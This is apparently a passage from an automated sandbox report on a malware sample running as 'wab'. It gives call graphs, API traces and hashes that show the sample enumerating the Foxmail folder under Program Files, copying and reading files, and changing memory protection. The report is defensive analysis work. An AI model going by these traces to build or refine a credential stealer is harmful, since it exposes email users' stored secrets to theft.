6465->6467 6468 35635c45 5 API calls 6467->6468 6469 35635dd9 6468->6469 6470 35635df1 TlsFree 6469->6470 6471 35635de5 6469->6471 6470->6471 6472 35632ada 5 API calls 6471->6472 6473 35635e02 6472->6473 6473->6464 6477 356374da 6474->6477 6478 356374f3 6477->6478 6479 35632ada 5 API calls 6478->6479 6480 35632625 6479->6480 6480->6373 6481->6065 7246 35635351 7247 35635360 7246->7247 7248 35635374 7246->7248 7247->7248 7250 3563571e 20 API calls 7247->7250 7249 3563571e 20 API calls 7248->7249 7251 35635386 7249->7251 7250->7248 7252 3563571e 20 API calls 7251->7252 7253 35635399 7252->7253 7254 3563571e 20 API calls 7253->7254 7255 356353aa 7254->7255 7256 3563571e 20 API calls 7255->7256 7257 356353bb 7256->7257 7397 356336d0 7398 356336e2 7397->7398 7400 356336f0 7397->7400 7399 35632ada 5 API calls 7398->7399 7399->7400 7813 35633c90 RtlUnwind 7401 35634ed7 7412 35636d60 7401->7412 7405 35634ef4 7408 3563571e 20 API calls 7405->7408 7409 35634f29 7408->7409 7410 35634eff 7411 3563571e 20 API calls 7410->7411 7411->7405 7413 35634ee9 7412->7413 7414 35636d69 7412->7414 7416 35637153 GetEnvironmentStringsW 7413->7416 7445 35636c5f 7414->7445 7417 3563716a 7416->7417 7427 356371bd 7416->7427 7420 35637170 WideCharToMultiByte 7417->7420 7418 356371c6 FreeEnvironmentStringsW 7419 35634eee 7418->7419 7419->7405 7428 35634f2f 7419->7428 7421 3563718c 7420->7421 7420->7427 7422 356356d0 21 API calls 7421->7422 7423 35637192 7422->7423 7424 356371af 7423->7424 7425 35637199 WideCharToMultiByte 7423->7425 7426 3563571e 20 API calls 7424->7426 7425->7424 7426->7427 7427->7418 7427->7419 7429 35634f44 7428->7429 7430 3563637b 20 API calls 7429->7430 7435 35634f6b 7430->7435 7431 35634fcf 7432 3563571e 20 API calls 7431->7432 7433 35634fe9 7432->7433 7433->7410 7434 3563637b 20 API calls 7434->7435 7435->7431 7435->7434 7436 35634fd1 7435->7436 7438 3563544d 26 API calls 7435->7438 7441 35634ff3 7435->7441 7443 3563571e 20 API calls 7435->7443 7437 35635000 20 API calls 7436->7437 7439 35634fd7 7437->7439 7438->7435 7440 3563571e 20 API calls 7439->7440 7440->7431 7442 356362bc 11 API calls 7441->7442 7444 35634fff 7442->7444 7443->7435 7446 35635af6 38 API calls 7445->7446 7447 35636c6c 7446->7447 7448 35636d7e 38 API calls 7447->7448 7449 35636c74 7448->7449 7465 356369f3 7449->7465 7454 35636cce 7457 3563571e 20 API calls 7454->7457 7459 35636c8b 7457->7459 7458 35636cc9 7460 35636368 20 API calls 7458->7460 7459->7413 7460->7454 7461 35636d12 7461->7454 7489 356368c9 7461->7489 7462 35636ce6 7462->7461 7463 3563571e 20 API calls 7462->7463 7463->7461 7466 356354a7 38 API calls 7465->7466 7467 35636a05 7466->7467 7468 35636a26 7467->7468 7469 35636a14 GetOEMCP 7467->7469 7470 35636a3d 7468->7470 7471 35636a2b GetACP 7468->7471 7469->7470 7470->7459 7472 356356d0 7470->7472 7471->7470 7473 3563570e 7472->7473 7478 356356de 7472->7478 7475 35636368 20 API calls 7473->7475 7474 356356f9 RtlAllocateHeap 7476 3563570c 7474->7476 7474->7478 7475->7476 7476->7454 7479 35636e20 7476->7479 7477 3563474f 7 API calls 7477->7478 7478->7473 7478->7474 7478->7477 7480 356369f3 40 API calls 7479->7480 7481 35636e3f 7480->7481 7482 35636e46 7481->7482 7484 35636eb5 7481->7484 7486 35636e90 IsValidCodePage 7481->7486 7483 35632ada 5 API calls 7482->7483 7485 35636cc1 7483->7485 7492 35636acb GetCPInfo 7484->7492 7485->7458 7485->7462 7486->7482 7487 35636ea2 GetCPInfo 7486->7487 7487->7482 7487->7484 7565 35636886 7489->7565 7491 356368ed 7491->7454 7493 35636baf 7492->7493 7499 35636b05 7492->7499 7496 35632ada 5 API calls 7493->7496 7498 35636c5b 7496->7498 7498->7482 7502 356386e4 7499->7502 7501 35638a3e 43 API calls 7501->7493 7503 356354a7 38 API calls 7502->7503 7504 35638704 MultiByteToWideChar 7503->7504 7506 35638742 7504->7506 7507 356387da 7504->7507 7511 356356d0 21 API calls 7506->7511 7512 35638763 7506->7512 7508 35632ada 5 API calls 7507->7508 7509 35636b66 7508->7509 7516 35638a3e 7509->7516 7510 356387d4 7521 35638801 7510->7521 7511->7512 7512->7510 7514 356387a8 MultiByteToWideChar 7512->7514 7514->7510 7515 356387c4 GetStringTypeW 7514->7515 7515->7510 7517 356354a7 38 API calls 7516->7517 7518 35638a51 7517->7518 7525 35638821 7518->7525 7522 3563881e 7521->7522 7523 3563880d 7521->7523 7522->7507 7523->7522 7524 3563571e 20 API calls 7523->7524 7524->7522 7526 3563883c 7525->7526 7527 35638862 MultiByteToWideChar 7526->7527 7528 35638a16 7527->7528 7529 3563888c 7527->7529 7530 35632ada 5 API calls 7528->7530 7532 356356d0 21 API calls 7529->7532 7535 356388ad 7529->7535 7531 35636b87 7530->7531 7531->7501 7532->7535 7533 356388f6 MultiByteToWideChar 7534 35638962 7533->7534 7536 3563890f 7533->7536 7538 35638801 20 API calls 7534->7538 7535->7533 7535->7534 7552 35635f19 7536->7552 7538->7528 7540 35638971 7542 356356d0 21 API calls 7540->7542 7546 35638992 7540->7546 7541 35638939 7541->7534 7544 35635f19 11 API calls 7541->7544 7542->7546 7543 35638a07 7545 35638801 20 API calls 7543->7545 7544->7534 7545->7534 7546->7543 7547 35635f19 11 API calls 7546->7547 7548 356389e6 7547->7548 7548->7543 7549 356389f5 WideCharToMultiByte 7548->7549 7549->7543 7550 35638a35 7549->7550 7551 35638801 20 API calls 7550->7551 7551->7534 7553 35635c45 5 API calls 7552->7553 7554 35635f40 7553->7554 7556 35635f49 7554->7556 7560 35635fa1 7554->7560 7558 35632ada 5 API calls 7556->7558 7559 35635f9b 7558->7559 7559->7534 7559->7540 7559->7541 7561 35635c45 5 API calls 7560->7561 7562 35635fc8 7561->7562 7563 35632ada 5 API calls 7562->7563 7564 35635f89 LCMapStringW 7563->7564 7564->7556 7566 35636892 7565->7566 7573 35635671 RtlEnterCriticalSection 7566->7573 7568 3563689c 7574 356368f1 7568->7574 7572 356368b5 7572->7491 7573->7568 7586 35637011 7574->7586 7576 3563693f 7577 35637011 26 API calls 7576->7577 7578 3563695b 7577->7578 7579 35637011 26 API calls 7578->7579 7580 35636979 7579->7580 7581 356368a9 7580->7581 7582 3563571e 20 API calls 7580->7582 7583 356368bd 7581->7583 7582->7581 7600 356356b9 RtlLeaveCriticalSection 7583->7600 7585 356368c7 7585->7572 7587 35637022 7586->7587 7595 3563701e 7586->7595 7588 35637029 7587->7588 7591 3563703c 7587->7591 7589 35636368 20 API calls 7588->7589 7590 3563702e 7589->7590 7592 356362ac 26 API calls 7590->7592 7593 35637073 7591->7593 7594 3563706a 7591->7594 7591->7595 7592->7595 7593->7595 7598 35636368 20 API calls 7593->7598 7596 35636368 20 API calls 7594->7596 7595->7576 7597 3563706f 7596->7597 7599 356362ac 26 API calls 7597->7599 7598->7597 7599->7595 7600->7585 7601 356373d5 7602 356373e1 7601->7602 7613 35635671 RtlEnterCriticalSection 7602->7613 7604 356373e8 7614 35638be3 7604->7614 7606 356373f7 7607 35637406 7606->7607 7627 35637269 GetStartupInfoW 7606->7627 7638 35637422 7607->7638 7610 35637417 7613->7604 7615 35638bef 7614->7615 7616 35638c13 7615->7616 7617 35638bfc 7615->7617 7641 35635671 RtlEnterCriticalSection 7616->7641 7618 35636368 20 API calls 7617->7618 7620 35638c01 7618->7620 7621 356362ac 26 API calls 7620->7621 7622 35638c0b 7621->7622 7622->7606 7623 35638c4b 7649 35638c72 7623->7649 7626 35638c1f 7626->7623 7642 35638b34 7626->7642 7628 35637286 7627->7628 7630 35637318 7627->7630 7629 35638be3 27 API calls 7628->7629 7628->7630 7631 356372af 7629->7631 7633 3563731f 7630->7633 7631->7630 7632 356372dd GetFileType 7631->7632 7632->7631 7637 35637326 7633->7637 7634 35637369 GetStdHandle 7634->7637 7635 356373d1 7635->7607 7636 3563737c GetFileType 7636->7637 7637->7634 7637->7635 7637->7636 7653 356356b9 RtlLeaveCriticalSection 7638->7653 7640 35637429 7640->7610 7641->7626 7643 3563637b 20 API calls 7642->7643 7644 35638b46 7643->7644 7646 35635eb7 11 API calls 7644->7646 7648 35638b53 7644->7648 7645 3563571e 20 API calls 7647 35638ba5 7645->7647 7646->7644 7647->7626 7648->7645 7652 356356b9 RtlLeaveCriticalSection 7649->7652 7651 35638c79 7651->7622 7652->7651 7653->7640 5818 35631c5b 5819 35631c6b 5818->5819 5822 356312ee 5819->5822 5821 35631c87 5823 35631324 5822->5823 5824 356313b7 GetEnvironmentVariableW 5823->5824 5848 356310f1 5824->5848 5827 356310f1 57 API calls 5828 35631465 5827->5828 5829 356310f1 57 API calls 5828->5829 5830 35631479 5829->5830 5831 356310f1 57 API calls 5830->5831 5832 3563148d 5831->5832 5833 356310f1 57 API calls 5832->5833 5834 356314a1 5833->5834 5835 356310f1 57 API calls 5834->5835 5836 356314b5 lstrlenW 5835->5836 5837 356314d9 lstrlenW 5836->5837 5847 356314d2 5836->5847 5838 356310f1 57 API calls 5837->5838 5839 35631501 lstrlenW lstrcatW 5838->5839 5840 356310f1 57 API calls 5839->5840 5841 35631539 lstrlenW lstrcatW 5840->5841 5842 356310f1 57 API calls 5841->5842 5843 3563156b lstrlenW lstrcatW 5842->5843 5844 356310f1 57 API calls 5843->5844 5845 3563159d lstrlenW lstrcatW 5844->5845 5846 356310f1 57 API calls 5845->5846 5846->5847 5847->5821 5849 35631118 5848->5849 5850 35631129 lstrlenW 5849->5850 5861 35632c40 5850->5861 5852 35631148 lstrcatW lstrlenW 5853 35631177 lstrlenW FindFirstFileW 5852->5853 5854 35631168 lstrlenW 5852->5854 5855 356311e1 5853->5855 5856 356311a0 5853->5856 5854->5853 5855->5827 5857 356311c7 FindNextFileW 5856->5857 5858 356311aa 5856->5858 5857->5856 5859 356311da FindClose 5857->5859 5858->5857 5863 35631000 5858->5863 5859->5855 5862 35632c57 5861->5862 5862->5852 5862->5862 5864 35631022 5863->5864 5865 356310af 5864->5865 5866 3563102f lstrcatW lstrlenW 5864->5866 5867 356310b5 lstrlenW 5865->5867 5878 356310ad 5865->5878 5868 3563106b lstrlenW 5866->5868 5869 3563105a lstrlenW 5866->5869 5894 35631e16 5867->5894 5880 35631e89 lstrlenW 5868->5880 5869->5868 5872 35631088 GetFileAttributesW 5874 3563109c 5872->5874 5872->5878 5873 356310ca 5875 35631e89 5 API calls 5873->5875 5873->5878 5874->5878 5886 3563173a 5874->5886 5876 356310df 5875->5876 5899 356311ea 5876->5899 5878->5858 5881 35632c40 5880->5881 5882 35631ea7 lstrcatW lstrlenW 5881->5882 5883 35631ec2 5882->5883 5884 35631ed1 lstrcatW 5882->5884 5883->5884 5885 35631ec7 lstrlenW 5883->5885 5884->5872 5885->5884 5887 35631747 5886->5887 5914 35631cca 5887->5914 5891 3563199f 5891->5878 5893 35631824 5893->5891 5934 356315da 5893->5934 5895 35631e29 5894->5895 5898 35631e4c 5894->5898 5896 35631e2d lstrlenW 5895->5896 5895->5898 5897 35631e3f lstrlenW 5896->5897 5896->5898 5897->5898 5898->5873 5900 3563120e 5899->5900 5901 35631e89 5 API calls 5900->5901 5902 35631220 GetFileAttributesW 5901->5902 5903 35631246 5902->5903 5904 35631235 5902->5904 5905 35631e89 5 API calls 5903->5905 5904->5903 5907 3563173a 35 API calls 5904->5907 5906 35631258 5905->5906 5908 356310f1 56 API calls 5906->5908 5907->5903 5909 3563126d 5908->5909 5910 35631e89 5 API calls 5909->5910 5911 3563127f 5910->5911 5912 356310f1 56 API calls 5911->5912 5913 356312e6 5912->5913 5913->5878 5915 35631cf1 5914->5915 5916 35631d0f CopyFileW CreateFileW 5915->5916 5917 35631d55 GetFileSize 5916->5917 5918 35631d44 DeleteFileW 5916->5918 5919 35631ede 22 API calls 5917->5919 5923 35631808 5918->5923 5920 35631d66 ReadFile 5919->5920 5921 35631d94 CloseHandle DeleteFileW 5920->5921 5922 35631d7d CloseHandle DeleteFileW 5920->5922 5921->5923 5922->5923 5923->5891 5924 35631ede 5923->5924 5926 3563222f 5924->5926 5927 3563224e 5926->5927 5930 35632250 5926->5930 5942 3563474f 5926->5942 5947 356347e5 5926->5947 5927->5893 5929 35632908 5931 356335d2 RaiseException 5929->5931 5930->5929 5954 356335d2 5930->5954 5933 35632925 5931->5933 5933->5893 5935 3563160c 5934->5935 5936 3563163c lstrlenW 5935->5936 6042 35631c9d 5936->6042 5938 35631655 lstrcatW lstrlenW 5939 35631678 5938->5939 5940 35631693 5939->5940 5941 3563167e lstrcatW 5939->5941 5940->5893 5941->5940 5957 35634793 5942->5957 5945 3563478f 5945->5926 5946 35634765 5963 35632ada 5946->5963 5953 356356d0 5947->5953 5948 3563570e 5976 35636368 5948->5976 5949 356356f9 RtlAllocateHeap 5951 3563570c 5949->5951 5949->5953 5951->5926 5952 3563474f 7 API calls 5952->5953 5953->5948 5953->5949 5953->5952 5955 356335f2 RaiseException 5954->5955 5955->5929 5958 3563479f 5957->5958 5970 35635671 RtlEnterCriticalSection 5958->5970 5960 356347aa 5971 356347dc 5960->5971 5962 356347d1 5962->5946 5964 35632ae3 5963->5964 5965 35632ae5 IsProcessorFeaturePresent 5963->5965 5964->5945 5967 35632b58 5965->5967 5975 35632b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5967->5975 5969 35632c3b 5969->5945 5970->5960 5974 356356b9 RtlLeaveCriticalSection 5971->5974 5973 356347e3 5973->5962 5974->5973 5975->5969 5979 35635b7a GetLastError 5976->5979 5980 35635b93 5979->5980 5981 35635b99 5979->5981 5998 35635e08 5980->5998 5985 35635bf0 SetLastError 5981->5985 6005 3563637b 5981->6005 5986 35635bf9 5985->5986 5986->5951 5987 35635bb3 6012 3563571e 5987->6012 5991 35635bb9 5993 35635be7 SetLastError 5991->5993 5992 35635bcf 6025 3563593c 5992->6025 5993->5986 5996 3563571e 17 API calls 5997 35635be0 5996->5997 5997->5985 5997->5993 6030 35635c45 5998->6030 6000 35635e2f 6001 35635e47 TlsGetValue 6000->6001 6002 35635e3b 6000->6002 6001->6002 6003 35632ada 5 API calls 6002->6003 6004 35635e58 6003->6004 6004->5981 6011 35636388 6005->6011 6006 356363c8 6008 35636368 19 API calls 6006->6008 6007 356363b3 RtlAllocateHeap 6009 35635bab 6007->6009 6007->6011 6008->6009 6009->5987 6018 35635e5e 6009->6018 6010 3563474f 7 API calls 6010->6011 6011->6006 6011->6007 6011->6010 6013 35635729 RtlFreeHeap 6012->6013 6017 35635752 6012->6017 6014 3563573e 6013->6014 6013->6017 6015 35636368 18 API calls 6014->6015 6016 35635744 GetLastError 6015->6016 6016->6017 6017->5991 6019 35635c45 5 API calls 6018->6019 6020 35635e85 6019->6020 6021 35635ea0 TlsSetValue 6020->6021 6024 35635e94 6020->6024 6021->6024 6022 35632ada 5 API calls 6023 35635bc8 6022->6023 6023->5987 6023->5992 6024->6022 6036 35635914 6025->6036 6033 35635c71 6030->6033 6035 35635c75 6030->6035 6031 35635c95 6034 35635ca1 GetProcAddress 6031->6034 6031->6035 6032 35635ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6032->6033 6033->6031 6033->6032 6033->6035 6034->6035 6035->6000 6037 35635854 RtlEnterCriticalSection RtlLeaveCriticalSection 6036->6037 6038 35635938 6037->6038 6039 356358c4 6038->6039 6040 35635758 20 API calls 6039->6040 6041 356358e8 6040->6041 6041->5996 6043 35631ca6 6042->6043 6043->5938 7814 35634a9a 7815 35635411 38 API calls 7814->7815 7816 35634aa2 7815->7816 7654 35634bdd 7655 35634c08 7654->7655 7656 35634bec 7654->7656 7658 35636d60 51 API calls 7655->7658 7656->7655 7657 35634bf2 7656->7657 7659 35636368 20 API calls 7657->7659 7660 35634c0f GetModuleFileNameA 7658->7660 7661 35634bf7 7659->7661 7662 35634c33 7660->7662 7663 356362ac 26 API calls 7661->7663 7677 35634d01 7662->7677 7664 35634c01 7663->7664 7667 35634e76 20 API calls 7668 35634c5d 7667->7668 7669 35634c72 7668->7669 7670 35634c66 7668->7670 7672 35634d01 38 API calls 7669->7672 7671 35636368 20 API calls 7670->7671 7676 35634c6b 7671->7676 7674 35634c88 7672->7674 7673 3563571e 20 API calls 7673->7664 7675 3563571e 20 API calls 7674->7675 7674->7676 7675->7676 7676->7673 7679 35634d26 7677->7679 7681 35634d86 7679->7681 7683 356370eb 7679->7683 7680 35634c50 7680->7667 7681->7680 7682 356370eb 38 API calls 7681->7682 7682->7681 7686 35637092 7683->7686 7687 356354a7 38 API calls 7686->7687 7688 356370a6 7687->7688 7688->7679 7306 3563281c 7307 35632882 27 API calls 7306->7307 7308 3563282a 7307->7308

                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                      Function 356310F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 35631137
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 35631151
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563115C
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563116D
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563117C
                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 35631193
                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 356311D0
                                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 356311DB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1083526818-0
                                                                                                                                                                                                                      • Opcode ID: 803ef2a8db4f75411f61684d057bda10f88a18eef74c32c20b6f61083df4645d
                                                                                                                                                                                                                      • Instruction ID: 079a857d0e69808d0846b5801bab8adf774e9290b36838d66da3485cbffe2717
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 803ef2a8db4f75411f61684d057bda10f88a18eef74c32c20b6f61083df4645d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 222191726083486BD720EE64DC49FDB7BACEF84754F00092AB959D31A0EB30D609C796
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0449A127 Relevance: 3.1, APIs: 2, Instructions: 53sleepnativeCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 127 449a127-449a15a 128 449a15c-449a168 call 449a2f7 127->128 130 449a16a 128->130 131 449a16f-449a17f 128->131 130->131 132 449a18a-449a1d2 NtProtectVirtualMemory call 449a2f7 131->132 133 449a181-449a188 Sleep 131->133 135 449a1d7-449a1e5 132->135 133->127 135->127
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000005), ref: 0449A185
                                                                                                                                                                                                                      • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0449A1CD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45046073128.0000000003AF9000.00000040.00000400.00020000.00000000.sdmp, Offset: 03AF9000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_3af9000_wab.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MemoryProtectSleepVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3235210055-0
                                                                                                                                                                                                                      • Opcode ID: c8736618fbd6b8f5007a1fdc57036d0f05c05cf477660a24c7744b20905a98aa
                                                                                                                                                                                                                      • Instruction ID: 89637d3d94433c57ae7275e8cb3624064d275b5c056ecd16a5d0e729264c8347
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8736618fbd6b8f5007a1fdc57036d0f05c05cf477660a24c7744b20905a98aa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C113A726803409FEB085E34C88DB9AB7E5AF15791F468189E8405B1B6D3A5D8C0CF02
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 356312EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 35631434
                                                                                                                                                                                                                        • Part of subcall function 356310F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 35631137
                                                                                                                                                                                                                        • Part of subcall function 356310F1: lstrcatW.KERNEL32(?,?), ref: 35631151
                                                                                                                                                                                                                        • Part of subcall function 356310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563115C
                                                                                                                                                                                                                        • Part of subcall function 356310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563116D
                                                                                                                                                                                                                        • Part of subcall function 356310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3563117C
                                                                                                                                                                                                                        • Part of subcall function 356310F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 35631193
                                                                                                                                                                                                                        • Part of subcall function 356310F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 356311D0
                                                                                                                                                                                                                        • Part of subcall function 356310F1: FindClose.KERNELBASE(00000000), ref: 356311DB
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 356314C5
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 356314E0
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 3563150F
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 35631521
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 35631547
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 35631553
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 35631579
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 35631585
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?), ref: 356315AB
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000), ref: 356315B7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                      • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                      • API String ID: 672098462-2938083778
                                                                                                                                                                                                                      • Opcode ID: 57301374c642eb3b3226f6bad01b0a939ff541022b98ca4ebdaa80174fd1a08b
                                                                                                                                                                                                                      • Instruction ID: 2f1a0a8c5a749a72f3d50370ccd02818bb7a945d89f71bd3e72c90f2172c1134
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57301374c642eb3b3226f6bad01b0a939ff541022b98ca4ebdaa80174fd1a08b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC818075A40398AADB20DBA1DC86FEE7379EF84710F0005D6F509E71A0EB715A84CF99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 3563C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(3563C7DD), ref: 3563C7E6
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,3563C7DD), ref: 3563C838
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3563C860
                                                                                                                                                                                                                        • Part of subcall function 3563C803: GetProcAddress.KERNEL32(00000000,3563C7F4), ref: 3563C804
                                                                                                                                                                                                                        • Part of subcall function 3563C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C816
                                                                                                                                                                                                                        • Part of subcall function 3563C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C82A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                                                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction ID: d5036293798a27f03575edb7a9e16d605a97478942b84caea12045411f1bcc9b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC01D244B4B75138BA9196740C03AAA6FA8AF276A0B101756F141969B3D9B18706C3AB
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 3563C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 79 3563c7a7-3563c7bc 80 3563c7be-3563c7c6 79->80 81 3563c82d 79->81 80->81 82 3563c7c8-3563c7f6 call 3563c7e6 80->82 83 3563c82f-3563c833 81->83 90 3563c7f8 82->90 91 3563c86c-3563c86e 82->91 85 3563c872 call 3563c877 83->85 86 3563c835-3563c83d GetModuleHandleA 83->86 89 3563c83f-3563c847 86->89 89->89 92 3563c849-3563c84c 89->92 95 3563c85b-3563c85e 90->95 96 3563c7fa-3563c7fe 90->96 93 3563c870 91->93 94 3563c866-3563c86b 91->94 92->83 97 3563c84e-3563c850 92->97 93->92 94->91 99 3563c85f-3563c860 GetProcAddress 95->99 102 3563c865 96->102 103 3563c800-3563c80b GetProcAddress 96->103 100 3563c852-3563c854 97->100 101 3563c856-3563c85a 97->101 99->102 100->99 101->95 102->94 103->81 104 3563c80d-3563c81a VirtualProtect 103->104 105 3563c82c 104->105 106 3563c81c-3563c82a VirtualProtect 104->106 105->81 106->105
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,3563C7DD), ref: 3563C838
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3563C860
                                                                                                                                                                                                                        • Part of subcall function 3563C7E6: GetModuleHandleA.KERNEL32(3563C7DD), ref: 3563C7E6
                                                                                                                                                                                                                        • Part of subcall function 3563C7E6: GetProcAddress.KERNEL32(00000000,3563C7F4), ref: 3563C804
